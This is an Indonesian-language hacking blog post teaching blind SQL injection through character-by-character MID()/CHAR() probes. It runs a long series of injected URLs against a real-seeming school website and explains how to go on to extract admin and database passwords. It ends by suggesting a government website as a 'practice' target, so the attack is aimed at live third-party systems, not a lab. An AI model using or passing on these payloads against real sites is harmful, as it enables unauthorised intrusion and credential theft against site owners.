Tuesday, 10.17.2017, 0:56 AM
N30-G4BR13L
Main | Publisher | Registration | Login
Site menu
Section categories
Trick Blog [9]
All About Computer and Network [3]
Hacking [22]
Do you know? [3]
Zona Religi [5]
Belajar Pemrograman [0]
My Diary [1]
My Playlist

My YM Pinbox

Powered by:
Statistics

Total online: 1
Guests: 1
Users: 0
Main » Articles » Hacking

BLIND SQL INJECTION
Apa sich Blind SQL Injection tu?

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan value tersebut / menguji true atau falsenya value tersebut...

disini GT memakai command :

mid()= hampir sama fungsinya dengan substring()
char()= adalah peubah dari karakter

lanjut..

ingat..sebelum mencoba,kita cek version sql nya..cara cek ada d tutorial sql inject yg satu lg..
kalau version 4..kita memakai blind,karena v4 tidak support query information_schema

kalau version 5,boleh pake ini,boleh pake sql inject yg biasa..wkwkwkw

lanjut...

Target: www.smanti.com (thx to bejamz udah ngasih target :)

1.PENGETESAN BUG

Seperti biasa..ikuti langkah sebelumnya,seperti di tutorial SQL Inject biasa..cari halaman yng dinamis,sisipkan and 1=0 dan and 1=1


www.smanti.com/berita.php?id=5 and 1=0 <<<false

www.smanti.com/berita.php?id=5 and 1=1 <<<true

eh ternyata ada bug nya...

lanjut....

2.BLIND INJECT

Query yg dipakai: and mid(user(),1,1)=CHAR(65)

saya jelaskan sedikit deh..

mid(user()1,1) = dalam kasus ini kita tidak tahu value dari user itu apa maka dalam "()" kita kosongkan dan angka 1,1 dibelakang () adalah urutan dari value tersebut

sedangkan CHAR adalah peubah dalam decimal dan (65) adalah value decimal tersebut.
kenapa kita mulai dengan 65 ?
karena "65" adalah "A" dalam ascii...

lanjut..

mari kita masukkan

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(65)

ternyata hasilnya masih false (beritanya hilang)

berarti value yg kita masukkan salah..

tinggal tambah value na..jadi..

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(66) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(67) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(68) <<masih false

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(69) <<masih false juga..

dst sampe kita menemukan keadaan true(beritanya muncul kembali)

kebetulan ada di char(83)

www.smanti.com/berita.php?id=5 and mid(user(),1,1)=CHAR(83)  <<akhirnya true..

cape?masih kuat?hahaha..trial n error...

lanjut..

kita tambain value na..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

adakah perbedaan nya?

yap,angka pada user kita naikkan menjadi 2 dan kita menambahkan value char kembali,dari 65..

gini nih..

1,1 = value pertama user
1,2 = value kedua user
1,3 = value ketiga user
dst
dan 83 adalah nilai true,lalu kita tambahkan..

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,65)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,66)

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,67)

dst.. sampe dpet yg true..

ternyata yg true ngumpet di value 77

www.smanti.com/berita.php?id=5 and mid(user(),1,2)=CHAR(83,77)


lanjutin trus langkah2na..

cari value k 3 user..

www.smanti.com/berita.php?id=5 and mid(user(),1,3)=CHAR(83,77,65)

eh langsung ktemu..hehehe..

lanjut value k 4..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,65)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,66)


www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,67)

ternyata ktemu di value 78..

www.smanti.com/berita.php?id=5 and mid(user(),1,4)=CHAR(83,77,65,78)

lanjut trus aja...

cape gw..


pokoknya..setelah dapet smua..kita convert char yang tadi di ke ascii table

www.piclist.com/techref/ascii.htm

stelah d convert,ternyata 83 77 65 78 tuh d ascii adalah SMAN

nah udah hampir ktebak user name nya..kerjain ndiri y..okey

nah..gmana kalo mw dapet password na?

kita rubah value
user() menjadi database() dan ulangi tahap2 diatas hingga mendapat semua value yang true..

jadi


www.smanti.com/berita.php?id=5 and mid(database(),1,1)=CHAR(65)

cari lagi..sama kayak cari user tadi..harus sabar..

ulangi sampai dapat true ..

tambain value na..wkwkwkw..

dan rubah value database() untuk mencari value lainnya..

hingga mendapat admin password dan db password
.
metode blind sql injection seperti ini membutuhkan kesabaran dan ketelitian attacker untuk mendapatkan value yg tepat..(true)

akan tetapi metode ini hingga sekarang cukup efektif untuk web yang telah menfilter celah sql injection...hehehe...

okey sampe sini aja ah..cape ngetik..wkwkwkw

slamat mencoba wkwkwkw...

Thanks smua..duduw..wkwkw sekian...


buat latihan>> www.dkp.go.id/content.php?c=5161

wkwkwkwkw awas situs negara...

================================================================================

source: hacker-newbie.org
Category: Hacking | Added by: neo-gabriel (08.16.2009)
Views: 359 | Rating: 0.0/0 |
Total comments: 0
Name *:
Email *:
Code *:
Search
Login form
My YM Status

Flag Counter
free counters
Silakan Berteriak!!
Link Back ya,
http://neo-gabriel.tk
My Friends

Copyright Neo-Gabriel © 2017